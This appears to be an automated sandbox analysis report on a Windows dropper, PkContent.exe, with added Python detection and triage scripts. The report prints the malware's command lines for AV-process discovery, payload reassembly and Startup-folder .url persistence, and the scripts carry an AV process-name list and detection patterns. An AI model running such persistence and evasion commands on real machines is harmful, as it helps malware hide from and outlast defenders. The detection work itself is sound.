
Windows Analysis Report
PkContent.exe

Overview

General Information

Sample name:PkContent.exe
Analysis ID:1577543
MD5:87c051a77edc0cc77a4d791ef72367d1
SHA1:5d5bab642235f0af7d9afe3cacec5ae2a4cfc8e5
SHA256:b63bf28780e02bf0bb1bb59dec135e6263f4c582724c95eee0519b279022f31c
Tags:18521511316185215113209bulletproofexenjratuser-abus3reports

Detection

Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Search for Antivirus process
AI detected suspicious sample
Drops PE files with a suspicious file extension
Machine Learning detection for sample
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • PkContent.exe (PID: 4436 cmdline: "C:\Users\user\Desktop\PkContent.exe" MD5: 87C051A77EDC0CC77A4D791EF72367D1)
    • cmd.exe (PID: 6532 cmdline: "C:\Windows\System32\cmd.exe" /c move Hammer Hammer.bat & Hammer.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 6504 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 6488 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 6192 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 6396 cmdline: findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 3524 cmdline: cmd /c md 724598 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 6104 cmdline: findstr /V "WowLiberalCalOfficer" Weight MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 2272 cmdline: cmd /c copy /b ..\Explorer + ..\West + ..\Agencies + ..\Situated y MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Thermal.pif (PID: 4836 cmdline: Thermal.pif y MD5: 18CE19B57F43CE0A5AF149C96AECC685)
        • cmd.exe (PID: 4760 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HermesKey.url" & echo URL="C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HermesKey.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 6572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • choice.exe (PID: 6540 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • wscript.exe (PID: 5640 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • HermesKey.scr (PID: 6396 cmdline: "C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr" "C:\Users\user\AppData\Local\GuardKey Solutions\g" MD5: 18CE19B57F43CE0A5AF149C96AECC685)
  • cleanup
No configs have been found
No yara matches
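The process tree above shows the whole dropper chain in plain command lines: a batch script that runs tasklist and pipes it through findstr /I for security-product process names, a copy /b that reassembles a split payload from several parts, a .pif started from a folder under %TEMP%, a .url written into the user's Startup folder that points at a .js, and choice /d y /t 5 used as a sleep. The Python below is an added example, not Joe Sandbox output or code, that turns those observations into detection rules over process-creation events. The event records are constructed from the tree (PIDs and paths as shown there); the field names Image, CommandLine, ParentImage and ProcessId follow the Sysmon Event ID 1 layout, which is an assumed telemetry schema, and the AV process-name list is copied from the two findstr command lines.

```python
"""Detection rules for the process-creation patterns in this report's tree.

Added example for this page, not Joe Sandbox code or output. Event records
are constructed from the report's process tree; the field names (Image,
CommandLine, ParentImage, ProcessId) follow the Sysmon Event ID 1 layout,
which is an assumption about the telemetry source, not something the
report states.
"""
import re
from typing import Dict, List, Tuple

# Security-product process names the batch script greps for; copied from
# the two findstr command lines in the report.
AV_PROCESS_TOKENS = {
    "wrsa", "opssvc", "avastui", "avgui", "bdservicehost",
    "nswscsvc", "sophoshealth",
}

ODD_EXEC_EXT = re.compile(r"\.(pif|scr|com)$", re.IGNORECASE)
USER_WRITABLE = re.compile(r"\\AppData\\(Local|Roaming)\\", re.IGNORECASE)
STARTUP_DIR = re.compile(r"Start Menu\\Programs\\Startup\\", re.IGNORECASE)
SCRIPT_EXT = re.compile(r"\.(js|jse|vbs|vbe|wsf)\b", re.IGNORECASE)


def image_name(path: str) -> str:
    """Basename of a Windows path, lower-cased."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event: Dict[str, str]) -> List[str]:
    """Return the names of every rule that fires for one process event."""
    hits: List[str] = []
    image = image_name(event["Image"])
    cmd = event["CommandLine"]
    cmd_l = cmd.lower()

    # tasklist | findstr /I "<av names>": discovery of security software.
    if image == "findstr.exe" and "/i" in cmd_l:
        if set(re.findall(r"[a-z0-9]+", cmd_l)) & AV_PROCESS_TOKENS:
            hits.append("av_process_discovery")

    # copy /b part1 + part2 + ... out: reassembling a split payload on disk.
    if image == "cmd.exe" and re.search(r"copy\s+/b\s+.+\+", cmd_l):
        hits.append("binary_concat_payload")

    # .pif/.scr/.com executed from a user-writable directory.
    if ODD_EXEC_EXT.search(event["Image"]) and USER_WRITABLE.search(event["Image"]):
        hits.append("odd_extension_from_user_dir")

    # echo ... > "...\Startup\x.url": logon persistence via an Internet Shortcut.
    if image == "cmd.exe" and STARTUP_DIR.search(cmd) and ".url" in cmd_l and ">" in cmd:
        hits.append("startup_url_persistence")

    # wscript/cscript running a script that lives under AppData.
    if image in ("wscript.exe", "cscript.exe") and USER_WRITABLE.search(cmd) \
            and SCRIPT_EXT.search(cmd_l):
        hits.append("script_host_from_user_dir")

    # choice /d <x> /t <n>: a sleep without a dedicated sleep binary.
    if image == "choice.exe" and "/d" in cmd_l and re.search(r"/t\s+\d+", cmd_l):
        hits.append("choice_sleep")

    return hits


def scan(events: List[Dict[str, str]]) -> List[Tuple[str, str, List[str]]]:
    """(ProcessId, image basename, fired rules) for every event with a hit."""
    out = []
    for e in events:
        rules = classify(e)
        if rules:
            out.append((e["ProcessId"], image_name(e["Image"]), rules))
    return out


# Constructed from the report's process tree (PIDs and paths as shown there).
SAMPLE_EVENTS = [
    {"ProcessId": "4436", "Image": r"C:\Users\user\Desktop\PkContent.exe",
     "ParentImage": "", "CommandLine": r'"C:\Users\user\Desktop\PkContent.exe"'},
    {"ProcessId": "6532", "Image": r"C:\Windows\SysWOW64\cmd.exe",
     "ParentImage": r"C:\Users\user\Desktop\PkContent.exe",
     "CommandLine": r'"C:\Windows\System32\cmd.exe" /c move Hammer Hammer.bat & Hammer.bat'},
    {"ProcessId": "6504", "Image": r"C:\Windows\SysWOW64\tasklist.exe",
     "ParentImage": r"C:\Windows\SysWOW64\cmd.exe", "CommandLine": "tasklist"},
    {"ProcessId": "6488", "Image": r"C:\Windows\SysWOW64\findstr.exe",
     "ParentImage": r"C:\Windows\SysWOW64\cmd.exe",
     "CommandLine": 'findstr /I "wrsa opssvc"'},
    {"ProcessId": "6104", "Image": r"C:\Windows\SysWOW64\findstr.exe",
     "ParentImage": r"C:\Windows\SysWOW64\cmd.exe",
     "CommandLine": 'findstr /V "WowLiberalCalOfficer" Weight'},
    {"ProcessId": "2272", "Image": r"C:\Windows\SysWOW64\cmd.exe",
     "ParentImage": r"C:\Windows\SysWOW64\cmd.exe",
     "CommandLine": r"cmd /c copy /b ..\Explorer + ..\West + ..\Agencies + ..\Situated y"},
    {"ProcessId": "4836", "Image": r"C:\Users\user\AppData\Local\Temp\724598\Thermal.pif",
     "ParentImage": r"C:\Windows\SysWOW64\cmd.exe", "CommandLine": "Thermal.pif y"},
    {"ProcessId": "4760", "Image": r"C:\Windows\SysWOW64\cmd.exe",
     "ParentImage": r"C:\Users\user\AppData\Local\Temp\724598\Thermal.pif",
     "CommandLine": (r'cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft'
                     r'\Windows\Start Menu\Programs\Startup\HermesKey.url" & echo URL="C:\Users'
                     r'\user\AppData\Local\GuardKey Solutions\HermesKey.js" >> "C:\Users\user'
                     r'\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HermesKey.url" & exit')},
    {"ProcessId": "6540", "Image": r"C:\Windows\SysWOW64\choice.exe",
     "ParentImage": r"C:\Windows\SysWOW64\cmd.exe", "CommandLine": "choice /d y /t 5"},
    {"ProcessId": "5640", "Image": r"C:\Windows\System32\wscript.exe", "ParentImage": "",
     "CommandLine": r'"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.js"'},
]

if __name__ == "__main__":
    for pid, image, rules in scan(SAMPLE_EVENTS):
        print(f"{pid:>5} {image:<14} {', '.join(rules)}")
```

Each rule is deliberately narrow: the findstr rule only fires when /I is combined with a known security-product name, so the `findstr /V "WowLiberalCalOfficer" Weight` step that strips a marker line out of the obfuscated payload does not count as AV discovery, and the concatenation rule keys on `copy /b` with a `+` rather than on any copy command.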

System Summary

Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.js", CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.js", ProcessId: 5640, ProcessName: wscript.exe
Source: Process started | Author: Max Altgelt (Nextron Systems) | Data: Command: Thermal.pif y, CommandLine: Thermal.pif y, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Hammer Hammer.bat & Hammer.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6532, ParentProcessName: cmd.exe, ProcessCommandLine: Thermal.pif y, ProcessId: 4836, ProcessName: Thermal.pif
Source: File created | Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io | Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif, ProcessId: 4836, TargetFilename: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr
Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif, ProcessId: 4836, TargetFilename: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.js", CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.js", ProcessId: 5640, ProcessName: wscript.exe

Data Obfuscation

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 4760, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HermesKey.url
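This file-creation event is the persistence step. cmd.exe echoes a two-line Internet Shortcut into the user's Startup folder, and its URL= value is not a web address but the local path of HermesKey.js, so at each logon Explorer opens the shortcut and the Windows Script Host runs the script. The Python below is an added triage example, not Joe Sandbox code, that parses .url files found in a Startup folder and flags targets that are local scripts or sit in user-writable locations. The malicious shortcut content is constructed from the two echo commands in the process tree; the list of user-writable directories and the benign contrast shortcut are assumptions made for the example.

```python
"""Triage Internet Shortcut (.url) files in a Windows Startup folder.

Added example for this page, not Joe Sandbox code. The dropper persists by
echoing a two-line .url into the user's Startup folder whose URL= value is a
local .js path, so Explorer hands the script to wscript.exe at logon. This
parses such files and flags targets that are local scripts or that live in
user-writable locations. The sample shortcut content is constructed from the
two echo commands in the report's process tree.
"""
import re
import tempfile
from pathlib import Path, PureWindowsPath
from typing import Dict, List, Optional

SCRIPT_EXT = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh", ".hta",
              ".bat", ".cmd", ".ps1"}
# Directories an unprivileged user can write to (assumed list, not from the report).
USER_WRITABLE = re.compile(
    r"\\(AppData|ProgramData|Temp|Users\\[^\\]+\\Downloads)\\", re.IGNORECASE)
# A local target, with or without a file:// prefix, using either slash style.
LOCAL_TARGET = re.compile(r"^(?:file:///?)?([a-zA-Z]:[\\/].*)$", re.IGNORECASE)


def parse_url_shortcut(text: str) -> Optional[str]:
    """Return the URL= value from the [InternetShortcut] section, quotes stripped.

    cmd's echo keeps the quotes the dropper wrote around the path and leaves a
    trailing space before the redirect, so each line is stripped first.
    """
    in_section = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line[1:-1].strip().lower() == "internetshortcut"
            continue
        if in_section and "=" in line:
            key, _, value = line.partition("=")
            if key.strip().lower() == "url":
                return value.strip().strip('"')
    return None


def assess_target(target: str) -> Dict[str, object]:
    """Decide whether a shortcut target is a local script or a user-writable path."""
    info: Dict[str, object] = {"target": target, "local": False, "script": False,
                               "user_writable": False, "suspicious": False}
    m = LOCAL_TARGET.match(target)
    if m:
        path = m.group(1).replace("/", "\\")
        info["local"] = True
        info["script"] = PureWindowsPath(path).suffix.lower() in SCRIPT_EXT
        info["user_writable"] = bool(USER_WRITABLE.search(path))
        info["suspicious"] = bool(info["script"] or info["user_writable"])
    return info


def scan_startup_dir(startup: Path) -> List[Dict[str, object]]:
    """Assess every *.url in a Startup folder; unparsable files are reported too."""
    results = []
    for f in sorted(startup.glob("*.url")):
        target = parse_url_shortcut(f.read_text(encoding="utf-8", errors="replace"))
        if target is None:
            results.append({"file": f.name, "target": None, "suspicious": False})
        else:
            results.append({"file": f.name, **assess_target(target)})
    return results


# Constructed: exactly what the two echo commands in the report produce.
SAMPLE_MALICIOUS = ('[InternetShortcut]\n'
                    'URL="C:\\Users\\user\\AppData\\Local\\GuardKey Solutions\\HermesKey.js"\n')
# Constructed benign shortcut for contrast.
SAMPLE_BENIGN = "[InternetShortcut]\nURL=https://www.example.com/\n"


def demo() -> List[Dict[str, object]]:
    """Write both samples into a temporary Startup folder and scan it."""
    with tempfile.TemporaryDirectory() as d:
        startup = Path(d)
        (startup / "HermesKey.url").write_text(SAMPLE_MALICIOUS, encoding="utf-8")
        (startup / "Docs.url").write_text(SAMPLE_BENIGN, encoding="utf-8")
        return scan_startup_dir(startup)


if __name__ == "__main__":
    for r in demo():
        flag = "SUSPICIOUS" if r["suspicious"] else "ok        "
        print(f'{flag} {r["file"]} -> {r["target"]}')
```

On a live host, point scan_startup_dir at %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup (and the all-users Startup folder) instead of the temporary directory; a .url whose target is a local script under AppData is the exact artifact this report records.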

HIPS / PFW / Operating System Protection Evasion

Source: Process started | Author: Joe Security | Data: Command: findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth", CommandLine: findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth", CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Hammer Hammer.bat & Hammer.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6532, ParentProcessName: cmd.exe, ProcessCommandLine: findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth", ProcessId: 6396, ProcessName: findstr.exe
No Suricata rule has matched

AV Detection

Source: PkContent.exe | Avira: detected
Source: PkContent.exe | ReversingLabs: Detection: 63%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.0% probability
Source: PkContent.exe | Joe Sandbox ML: detected
Source: PkContent.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: PkContent.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\PkContent.exe | Code function: 0_2_004062D5 FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\PkContent.exe | Code function: 0_2_00402E18 FindFirstFileW
Source: C:\Users\user\Desktop\PkContent.exe | Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | Code function: 11_2_007D4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | Code function: 11_2_007D494A GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | Code function: 11_2_007D3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | Code function: 11_2_007DC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | Code function: 11_2_007DCD14 FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | Code function: 11_2_007DCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | Code function: 11_2_007DF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | Code function: 11_2_007DF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | Code function: 11_2_007DFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr | Code function: 17_2_00914005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr | Code function: 17_2_0091494A GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr | Code function: 17_2_0091C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr | Code function: 17_2_0091CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr | Code function: 17_2_0091CD14 FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr | Code function: 17_2_0091F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr | Code function: 17_2_0091F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr | Code function: 17_2_0091FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr | Code function: 17_2_00913CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\724598\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\724598
Source: unknown | DNS traffic detected: query: ctIHfwPuGQOYqdJrz.ctIHfwPuGQOYqdJrz reply code: Name error (3)
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | Code function: 11_2_007E29BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile
Source: global traffic | DNS traffic detected: DNS query: ctIHfwPuGQOYqdJrz.ctIHfwPuGQOYqdJrz
Source: PkContent.exe, 00000000.00000003.2079934627.00000000029F3000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif, 0000000B.00000003.2114681102.0000000003A56000.00000004.00000800.00020000.00000000.sdmp, Thermal.pif, 0000000B.00000002.3937117331.0000000001130000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif.2.dr, Ought.0.dr, HermesKey.scr.11.dr | String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: PkContent.exe, 00000000.00000003.2079934627.00000000029F3000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif, 0000000B.00000003.2114681102.0000000003A56000.00000004.00000800.00020000.00000000.sdmp, Thermal.pif, 0000000B.00000002.3937117331.0000000001130000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif.2.dr, Ought.0.dr, HermesKey.scr.11.dr | String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: PkContent.exe, 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmp, PkContent.exe, 00000000.00000003.2079934627.00000000029F3000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif, 0000000B.00000003.2114681102.0000000003A56000.00000004.00000800.00020000.00000000.sdmp, Thermal.pif, 0000000B.00000002.3937117331.0000000001130000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif.2.dr, Ought.0.dr, HermesKey.scr.11.dr | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: PkContent.exe, 00000000.00000003.2079934627.00000000029F3000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif, 0000000B.00000003.2114681102.0000000003A56000.00000004.00000800.00020000.00000000.sdmp, Thermal.pif, 0000000B.00000002.3937117331.0000000001130000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif.2.dr, Ought.0.dr, HermesKey.scr.11.dr | String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: PkContent.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: PkContent.exe, 00000000.00000003.2079934627.00000000029F3000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif, 0000000B.00000003.2114681102.0000000003A56000.00000004.00000800.00020000.00000000.sdmp, Thermal.pif, 0000000B.00000002.3937117331.0000000001130000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif.2.dr, Ought.0.dr, HermesKey.scr.11.dr | String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: PkContent.exe, 00000000.00000003.2079934627.00000000029F3000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif, 0000000B.00000003.2114681102.0000000003A56000.00000004.00000800.00020000.00000000.sdmp, Thermal.pif, 0000000B.00000002.3937117331.0000000001130000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif.2.dr, Ought.0.dr, HermesKey.scr.11.dr | String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: PkContent.exe, 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmp, PkContent.exe, 00000000.00000003.2079934627.00000000029F3000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif, 0000000B.00000003.2114681102.0000000003A56000.00000004.00000800.00020000.00000000.sdmp, Thermal.pif, 0000000B.00000002.3937117331.0000000001130000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif.2.dr, Ought.0.dr, HermesKey.scr.11.dr | String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: PkContent.exe, 00000000.00000003.2079934627.00000000029F3000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif, 0000000B.00000003.2114681102.0000000003A56000.00000004.00000800.00020000.00000000.sdmp, Thermal.pif, 0000000B.00000002.3937117331.0000000001130000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif.2.dr, Ought.0.dr, HermesKey.scr.11.dr | String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: PkContent.exe, 00000000.00000003.2079934627.00000000029F3000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif, 0000000B.00000003.2114681102.0000000003A56000.00000004.00000800.00020000.00000000.sdmp, Thermal.pif, 0000000B.00000002.3937117331.0000000001130000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif.2.dr, Ought.0.dr, HermesKey.scr.11.dr | String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: PkContent.exe, 00000000.00000003.2079934627.00000000029F3000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif, 0000000B.00000003.2114681102.0000000003A56000.00000004.00000800.00020000.00000000.sdmp, Thermal.pif, 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp, HermesKey.scr, 00000011.00000002.3935835156.0000000000979000.00000002.00000001.01000000.00000008.sdmp, Thermal.pif.2.dr, Ought.0.dr, HermesKey.scr.11.dr | String found in binary or memory: http://www.autoitscript.com/autoit3/J
